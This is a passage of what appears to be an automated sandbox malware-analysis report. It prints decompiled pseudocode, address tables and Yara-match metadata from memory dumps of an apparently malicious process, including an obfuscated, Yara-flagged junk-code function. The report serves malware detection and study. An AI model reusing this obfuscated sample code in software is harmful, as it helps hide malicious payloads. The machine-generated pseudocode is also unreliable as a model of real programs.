								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E033EF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E033E13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L033C77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E033E9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                          0x033ac608
                                          0x033ac615
                                          0x033ac625
                                          0x033ac62d
                                          0x033ac635
                                          0x033ac640
                                          0x033ac680
                                          0x033ac687
                                          0x033ac688
                                          0x033ac689
                                          0x033ac694
                                          0x033ac694
                                          0x033ac642
                                          0x033ac64a
                                          0x033ac697
                                          0x03417a25
                                          0x03417a2b
                                          0x03417a2e
                                          0x03417a30
                                          0x03417bea
                                          0x03417bea
                                          0x00000000
                                          0x03417bea
                                          0x03417a36
                                          0x03417a43
                                          0x03417a48
                                          0x03417a4c
                                          0x03417a4e
                                          0x00000000
                                          0x00000000
                                          0x03417a58
                                          0x03417a5a
                                          0x03417a5b
                                          0x03417a5c
                                          0x03417a5d
                                          0x03417a63
                                          0x03417a64
                                          0x03417a6a
                                          0x03417a6c
                                          0x03417a6e
                                          0x034179cb
                                          0x034179cb
                                          0x034179ce
                                          0x034179d0
                                          0x03417a98
                                          0x03417a9b
                                          0x03417a9b
                                          0x03417a9e
                                          0x03417aa1
                                          0x03417bbe
                                          0x03417bbe
                                          0x03417bc0
                                          0x03417be0
                                          0x03417be0
                                          0x03417a01
                                          0x03417a01
                                          0x03417a05
                                          0x03417a07
                                          0x03417a15
                                          0x03417a15
                                          0x03417a1a
                                          0x00000000
                                          0x03417a1a
                                          0x03417bc2
                                          0x03417bc6
                                          0x03417bc9
                                          0x03417bcd
                                          0x03417bcf
                                          0x034179e6
                                          0x034179e6
                                          0x034179eb
                                          0x034179eb
                                          0x034179ef
                                          0x034179f1
                                          0x00000000
                                          0x00000000
                                          0x034179f3
                                          0x034179f5
                                          0x034179ff
                                          0x034179ff
                                          0x00000000
                                          0x034179ff
                                          0x034179f7
                                          0x034179fd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x034179fd
                                          0x03417bd5
                                          0x03417bd8
                                          0x00000000
                                          0x00000000
                                          0x03417ba9
                                          0x03417bac
                                          0x03417bb0
                                          0x03417bb1
                                          0x03417bb1
                                          0x03417bb6
                                          0x00000000
                                          0x03417bb6
                                          0x03417aa7
                                          0x03417aaa
                                          0x00000000
                                          0x00000000
                                          0x03417ab2
                                          0x03417ab3
                                          0x03417ab5
                                          0x03417aec
                                          0x03417aef
                                          0x03417b25
                                          0x03417b28
                                          0x03417b62
                                          0x03417b64
                                          0x03417b8f
                                          0x03417b92
                                          0x03417b96
                                          0x03417b98
                                          0x00000000
                                          0x00000000
                                          0x03417b9e
                                          0x03417b9f
                                          0x03417ba3
                                          0x00000000
                                          0x03417ba3
                                          0x03417b66
                                          0x03417b68
                                          0x03417ae2
                                          0x03417ae2
                                          0x00000000
                                          0x03417ae2
                                          0x03417b6e
                                          0x03417b72
                                          0x03417b75
                                          0x03417b81
                                          0x03417b85
                                          0x03417b87
                                          0x00000000
                                          0x00000000
                                          0x03417b31
                                          0x03417b34
                                          0x03417b3c
                                          0x03417b45
                                          0x03417b46
                                          0x03417b4f
                                          0x03417b51
                                          0x03417b57
                                          0x03417b59
                                          0x03417b59
                                          0x00000000
                                          0x03417b59
                                          0x03417b77
                                          0x00000000
                                          0x03417b77
                                          0x03417b2a
                                          0x00000000
                                          0x03417b2a
                                          0x03417af1
                                          0x03417af3
                                          0x00000000
                                          0x00000000
                                          0x03417afb
                                          0x03417afc
                                          0x03417afe
                                          0x00000000
                                          0x00000000
                                          0x03417b00
                                          0x03417b03
                                          0x00000000
                                          0x00000000
                                          0x03417b05
                                          0x03417b09
                                          0x03417b0d
                                          0x03417b0f
                                          0x00000000
                                          0x00000000
                                          0x03417b18
                                          0x03417b1d
                                          0x00000000
                                          0x03417b1d
                                          0x03417ab7
                                          0x03417ab9
                                          0x00000000
                                          0x00000000
                                          0x03417abf
                                          0x03417ac1
                                          0x00000000
                                          0x00000000
                                          0x03417ac3
                                          0x03417ac6
                                          0x00000000
                                          0x00000000
                                          0x03417ac8
                                          0x03417acc
                                          0x03417ad0
                                          0x03417ad2
                                          0x00000000
                                          0x00000000
                                          0x03417adb
                                          0x00000000
                                          0x03417adb
                                          0x034179d6
                                          0x034179d9
                                          0x034179dc
                                          0x03417a91
                                          0x03417a94
                                          0x00000000
                                          0x03417a94
                                          0x034179e2
                                          0x00000000
                                          0x034179e2
                                          0x03417a74
                                          0x03417a7a
                                          0x00000000
                                          0x00000000
                                          0x03417a8a
                                          0x03417a21
                                          0x03417a21
                                          0x00000000
                                          0x03417a21
                                          0x033ac650
                                          0x033ac651
                                          0x033ac656
                                          0x033ac65c
                                          0x033ac65d
                                          0x033ac663
                                          0x033ac664
                                          0x033ac66a
                                          0x033ac66e
                                          0x034179c5
                                          0x034179c7
                                          0x00000000
                                          0x034179c7
                                          0x033ac67a
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e9feb152216329ad404732473d139dface1ece7cc8f172c87a509594592d02a8
                                          • Instruction ID: e4f9095123bbaae622d43bf1332568a535be8203350f1e2b8725f1033647687a
                                          • Opcode Fuzzy Hash: e9feb152216329ad404732473d139dface1ece7cc8f172c87a509594592d02a8
                                          • Instruction Fuzzy Hash: 3681AE75B04A018FDB21CE14C880A6BBBE8FB84394F18486BED559F340D731ED55CBAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041D84E, Relevance: .2, Instructions: 212COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 32%
                                          			E0041D84E(void* __eax, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				void* _t30;
				signed int _t31;
				signed char _t32;
				signed char _t33;
				signed char _t35;
				signed int _t54;
				signed int _t58;
				signed int _t59;

				_t59 = __esi;
				_t54 = __edi;
				_t41 = __ecx;
				asm("sbb [0xe2f41cf0], ebp");
				asm("ror dword [0xb07808be], 0x3b");
				asm("cmpsw");
				 *0x16fb9ee0 =  *0x16fb9ee0 & __edx;
				 *0xa8429211 =  *0xa8429211 >> 0;
				_t35 =  *0x2d383433;
				if(_t67 !=  *0x50189861) {
					L1:
					 *0xafc4e909 =  *0xafc4e909 << 0x95;
					 *0x45a888cf =  *0x45a888cf + _t59;
					_pop( *0x2e0d36a1);
					_t35 = _t35 +  *0xf04a47fa;
				} else {
					asm("ror dword [0xfc00b77b], 0x45");
					asm("ror dword [0x9980d331], 0x60");
					__ebx =  *0xe7dc10f4;
					__eax = __eax & 0x0fd55337;
					__esi = __esi | 0x9773a187;
					__bh = __bh + 0x2a;
					asm("adc [0x59a512e1], bh");
					asm("movsb");
					asm("ror dword [0x1ec7bdce], 0xa6");
					asm("sbb al, [0xa46a68c9]");
					asm("adc al, [0xbb2dcf02]");
					__ecx = __ecx |  *0x6308f129;
					asm("sbb ecx, 0x2d0addfd");
					__dh = __dh -  *0x4a1603b6;
					asm("rcr byte [0x9da3c2e6], 0xdf");
					asm("adc al, 0x82");
					asm("rcl dword [0x21cb7167], 0x3b");
					__ecx = __esi;
					__ecx = __ecx &  *0xd9b5f0c8;
					__eax = __eax ^ 0xf103150b;
					__ebp =  *0x6bef2c01;
					_pop( *0x573169fd);
					__ebx = 0xbc522fd4;
					__esp = __esp |  *0x3abf8611;
					__ebx =  *0x867ac92b;
					 *0x867ac92b = 0xbc522fd4;
					__edi = __edi + 1;
					__edx = __edx ^  *0x7a44748f;
					 *0x3cf5b3cc =  *0x3cf5b3cc ^ __ebp;
					__edx = __edx &  *0x330cd5fa;
					 *0x1ba7dbb0 =  *0x1ba7dbb0 ^ __dl;
					asm("sbb ecx, [0x23af2015]");
					__ebp = __ebp + 0xf65a1803;
					asm("ror byte [0xaba103b3], 0xb3");
					__esi =  *0xe4c212f1;
					__ebx =  *0x867ac92b + 0x1414a301;
					 *0xb623af20 =  *0xb623af20 << 0x7c;
					 *0xf55c1803 =  *0xf55c1803 | __ecx;
					if(__ebp >= 0) {
						goto L1;
						do {
							do {
								do {
									do {
										do {
											do {
												do {
													do {
														goto L1;
													} while (_t35 < 0);
													asm("rol dword [0xcc521fea], 0x1e");
													_push(_t41);
													asm("rcr dword [0xd385ee8f], 0x16");
													asm("rol dword [0x570d919], 0xca");
													 *0xa0af9322 =  *0xa0af9322 >> 0x79;
													asm("adc edx, [0x29c07b16]");
													 *0x28bb49b4 = (_t35 | 0x000000b2) + 0xcc203693;
													 *0xc756d085 = _t59;
													_push( *0xc756d085);
													_t30 = 0x32 -  *0xabfaad36 -  *0xdc1dc510;
													 *0xad0ae102 =  *0xad0ae102 &  *0x12fa4fcb;
													_t41 = 0x4b808c0e;
													_push( *0xbae23bf7);
													_t67 = 0xc86709d3;
													_t35 =  *0x536beec;
													 *0xc56a0a18 =  *0xc56a0a18 >> 0xf3;
													_t54 = (_t54 | 0x6822b272) -  *0x5dd48cd + 2;
													_t59 =  *0xad3eb6b * 0x909e;
												} while (_t59 == 0);
												 *0x60b4ef74 =  *0x60b4ef74 << 0x4a;
												 *0xfd3ea67 =  *0xfd3ea67 + 0x4b808c0e;
												asm("stosd");
												_t31 = _t30 - 1;
												_t35 = (_t35 |  *0xe22f6564) & 0xb5541205;
											} while (_t35 > 0);
											_t59 =  *0x8a83ea7f * 0x2af4;
											asm("adc [0x6cd8c587], edi");
										} while (_t59 >= 0);
										_t67 =  *0xc5a85e71;
										 *0xc5a85e71 = 0xc86709d3;
										_push( *0x3e2ba59b);
										 *0x246ca9a3 =  *0x246ca9a3 | 0x5c796b83;
										 *0x3b2544bf =  *0x3b2544bf >> 0x99;
										_t41 = 0x4b808c0e +  *0x9237aa96;
										asm("sbb ecx, [0x99ebf6ec]");
										asm("adc esi, 0x3f59e8b8");
										_push(_t35);
										asm("sbb ebp, [0xaa5c3001]");
										asm("adc edx, [0xb5d75ea9]");
										 *0xd5930688 =  *0xd5930688 - 0x5c796b84;
									} while (( *0x8efe5ebc & _t31) <= 0);
									_t32 = _t31 & 0x5e238776;
									asm("adc edi, [0x507d7b26]");
									_t54 =  *0x5d182001;
									asm("ror dword [0xa5696b1f], 0xa5");
									asm("sbb [0xdee53639], esp");
									_t59 = _t59 |  *0x9da8de68;
									_t35 = 0x0000002c |  *0xe8323dbc;
									asm("scasb");
									_t41 = _t41 + 1;
								} while (0x4b808c0e < 0);
								_t33 = _t32 ^ 0x00000086;
								 *0xa2302b1f =  *0xa2302b1f & _t67;
								_t11 = _t35 &  *0xa967ff9e;
								_t35 =  *0xa6efbdba;
								 *0xa6efbdba = _t11;
								_t54 = _t54 ^  *0x2e3f66ee;
								asm("movsw");
								_pop(_t59);
							} while (0x5c796b83 != 0);
							asm("sbb esi, [0x19794f75]");
							 *0xfe510fca = 0x5c796b83;
							asm("stosd");
							_t58 =  *0xfe4a1fcd;
							 *0x66368e91 =  *0x66368e91 + _t58;
							asm("adc dl, 0xb0");
							asm("adc edx, [0x5e9f141b]");
							_t41 = (_t41 &  *0xb6504bfa) + 1;
							 *0xcb5f57f0 =  *0xcb5f57f0 ^ 0x4b808c0e;
							asm("rol dword [0x4362de1b], 0xd0");
							_push(0x4b808c0e);
							_t35 = _t35 | 0x000000e4;
							 *0xd5d43784 =  *0xd5d43784 ^  *0xfe510fca;
							_t54 = _t58 |  *0xf654d60b;
						} while (_t54 >= 0);
						_push(_t35);
						asm("rcr dword [0xe6959d27], 0x96");
						return _t33 + 1;
					} else {
						__edi =  *0xc7e3bf7d * 0x21b9;
						__ecx = 0x1adb5bc8;
						__edx = __edx - 1;
						asm("sbb ch, 0x0");
						__edi =  *0xc7e3bf7d * 0x21b9 +  *0x23af2021;
						 *0x2d18f0f2 =  *0x2d18f0f2 - __dl;
						__eax =  *0x10758213;
						__edi =  *0xc7e3bf7d * 0x21b9 +  *0x23af2021 - 1;
						 *0x1677a887 =  *0x1677a887 >> 2;
						__ebx = __ebx - 1;
						__edx = __edx +  *0x3c129081;
						_pop( *0xd668912b);
						L1();
						__ebx = __ebx ^  *0x850ed9e8;
						asm("cmpsb");
						_push(__esp);
						__edx = __edx ^ 0x1c79058c;
						__esp = __esp +  *0x114c398c;
						asm("ror dword [0xd21e1201], 0xf0");
						_push(0xac5f5f99);
						 *0xf4cc6f26 =  *0xf4cc6f26 - __esp;
						asm("adc ch, [0x37871634]");
						_push(__esi);
						 *0x7410fd28 =  *0x7410fd28 + __al;
						return  *0x10758213;
					}
				}
			}











                                          0x0041d84e
                                          0x0041d84e
                                          0x0041d84e
                                          0x0041d856
                                          0x0041d85c
                                          0x0041d863
                                          0x0041d865
                                          0x0041d86b
                                          0x0041d872
                                          0x0041d87f
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf9d
                                          0x0041cfa3
                                          0x0041cfa9
                                          0x0041d885
                                          0x0041d885
                                          0x0041d88c
                                          0x0041d893
                                          0x0041d89f
                                          0x0041d8a4
                                          0x0041d8aa
                                          0x0041d8ad
                                          0x0041d8ba
                                          0x0041d8bb
                                          0x0041d8c2
                                          0x0041d8ce
                                          0x0041d8d4
                                          0x0041d8db
                                          0x0041d8ed
                                          0x0041d8f3
                                          0x0041d8fa
                                          0x0041d8fc
                                          0x0041d903
                                          0x0041d904
                                          0x0041d90a
                                          0x0041d915
                                          0x0041d91b
                                          0x0041d921
                                          0x0041d929
                                          0x0041d92f
                                          0x0041d92f
                                          0x0041d935
                                          0x0041d93c
                                          0x0041d942
                                          0x0041d948
                                          0x0041d94e
                                          0x0041d954
                                          0x0041d95d
                                          0x0041d963
                                          0x0041d973
                                          0x0041d979
                                          0x0041d97f
                                          0x0041d986
                                          0x0041d992
                                          0x00000000
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x0041cf96
                                          0x00000000
                                          0x00000000
                                          0x0041cfb7
                                          0x0041cfd2
                                          0x0041cfd3
                                          0x0041cfda
                                          0x0041cfec
                                          0x0041cff6
                                          0x0041d008
                                          0x0041d024
                                          0x0041d02a
                                          0x0041d031
                                          0x0041d037
                                          0x0041d03d
                                          0x0041d042
                                          0x0041d048
                                          0x0041d054
                                          0x0041d060
                                          0x0041d06d
                                          0x0041d06e
                                          0x0041d06e
                                          0x0041d07e
                                          0x0041d088
                                          0x0041d094
                                          0x0041d0a1
                                          0x0041d0a2
                                          0x0041d0a2
                                          0x0041d0ae
                                          0x0041d0b8
                                          0x0041d0b8
                                          0x0041d0c4
                                          0x0041d0c4
                                          0x0041d0ca
                                          0x0041d0d1
                                          0x0041d0d7
                                          0x0041d0de
                                          0x0041d0e4
                                          0x0041d0ea
                                          0x0041d0f0
                                          0x0041d0f1
                                          0x0041d0f7
                                          0x0041d0fd
                                          0x0041d103
                                          0x0041d10f
                                          0x0041d114
                                          0x0041d11c
                                          0x0041d122
                                          0x0041d12f
                                          0x0041d135
                                          0x0041d13b
                                          0x0041d14e
                                          0x0041d14f
                                          0x0041d14f
                                          0x0041d160
                                          0x0041d169
                                          0x0041d16f
                                          0x0041d16f
                                          0x0041d16f
                                          0x0041d180
                                          0x0041d186
                                          0x0041d189
                                          0x0041d189
                                          0x0041d190
                                          0x0041d196
                                          0x0041d19c
                                          0x0041d19d
                                          0x0041d1a3
                                          0x0041d1af
                                          0x0041d1b2
                                          0x0041d1b8
                                          0x0041d1b9
                                          0x0041d1bf
                                          0x0041d1c6
                                          0x0041d1c7
                                          0x0041d1ca
                                          0x0041d1d0
                                          0x0041d1d0
                                          0x0041d1e6
                                          0x0041d1e8
                                          0x0041d1ef
                                          0x0041d998
                                          0x0041d998
                                          0x0041d9a2
                                          0x0041d9a8
                                          0x0041d9a9
                                          0x0041d9ac
                                          0x0041d9be
                                          0x0041d9c4
                                          0x0041d9c9
                                          0x0041d9ca
                                          0x0041d9d1
                                          0x0041d9d2
                                          0x0041d9d8
                                          0x0041d9de
                                          0x0041d9e3
                                          0x0041d9e9
                                          0x0041d9ea
                                          0x0041d9f1
                                          0x0041d9f7
                                          0x0041d9fd
                                          0x0041da04
                                          0x0041da0f
                                          0x0041da15
                                          0x0041da1b
                                          0x0041da1c
                                          0x0041da22
                                          0x0041da22
                                          0x0041d992

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b9237960024cb394d478101301eea043e8e987d987b651513164082ae79161c4
                                          • Instruction ID: 69694f8da382a9910a8978c8a389e8436ef2de86ca2fd62103e46e1b8ebcace0
                                          • Opcode Fuzzy Hash: b9237960024cb394d478101301eea043e8e987d987b651513164082ae79161c4
                                          • Instruction Fuzzy Hash: 3BA15072958381CFDB16CF38C9967823FB2F786324B08424ED5A1A7292D7382456CF89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03426DC9, Relevance: .2, Instructions: 199COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E03426DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L033C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E03426B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E033C7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E033E9AE0();
					_t87 = L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0342795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0342795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0342795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0342795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L033C4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E03426B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E03426B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E03426B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E03426B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E033C7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E033E9AE0();
								L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L033C2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L033C2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L033C2400( &_v52);
							}
							if(_v28 >= 0) {
								return L033C2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                          0x03426dd4
                                          0x03426dde
                                          0x03426de1
                                          0x03426de3
                                          0x03426de6
                                          0x03426de9
                                          0x03426dec
                                          0x03426def
                                          0x03426df2
                                          0x03426df5
                                          0x03426dfe
                                          0x03426e04
                                          0x03426e09
                                          0x03426e0d
                                          0x03426e18
                                          0x03426e1b
                                          0x03426e22
                                          0x03426e2d
                                          0x03426e30
                                          0x03426e36
                                          0x03426e42
                                          0x03426e4d
                                          0x03426e50
                                          0x03426e55
                                          0x03426e5c
                                          0x03426e6e
                                          0x03426e5e
                                          0x03426e67
                                          0x03426e67
                                          0x03426e73
                                          0x03426e74
                                          0x03426e77
                                          0x03426e7c
                                          0x03426e7d
                                          0x03426e8e
                                          0x03426e93
                                          0x03426e9c
                                          0x03426ea8
                                          0x03426eab
                                          0x03426eac
                                          0x03426eb3
                                          0x03426ecd
                                          0x03426edc
                                          0x03426ee2
                                          0x03426ee5
                                          0x03426ef2
                                          0x03426efb
                                          0x03426f01
                                          0x03426f06
                                          0x03426f0b
                                          0x03426f11
                                          0x03426f1a
                                          0x03426f22
                                          0x03426f26
                                          0x03426f26
                                          0x03426f33
                                          0x03426f41
                                          0x03426f44
                                          0x03426f47
                                          0x03426f54
                                          0x03426f65
                                          0x03426f77
                                          0x03426f7c
                                          0x03426f82
                                          0x03426f91
                                          0x03426f99
                                          0x03426fa3
                                          0x03426fae
                                          0x03426fae
                                          0x03426fba
                                          0x03426fbb
                                          0x03426fbc
                                          0x03426fc1
                                          0x03426fc2
                                          0x03426fd3
                                          0x03426fd8
                                          0x03426fd8
                                          0x03426fdf
                                          0x03426fe8
                                          0x03426fee
                                          0x03426fee
                                          0x03426ff5
                                          0x03426ffb
                                          0x03426ffb
                                          0x03427004
                                          0x00000000
                                          0x0342700a
                                          0x03427004
                                          0x03426eb3
                                          0x03426e9c
                                          0x03427015

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction ID: 936ae3a389d90eebbd60b3518aa2bb97a3b1b4b7615f2565ccd7f38dbcb5d91c
                                          • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction Fuzzy Hash: 40718E75E00219EFCB10DFA5C984AEEBBB8FF48300F14446AE505EB250DB34EA41CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0343B8D0, Relevance: .2, Instructions: 199COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E0343B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x3497b9c; // 0x0
				_t124 = L033C4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E033E9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E033E95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E033E95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L033C77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E033E9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
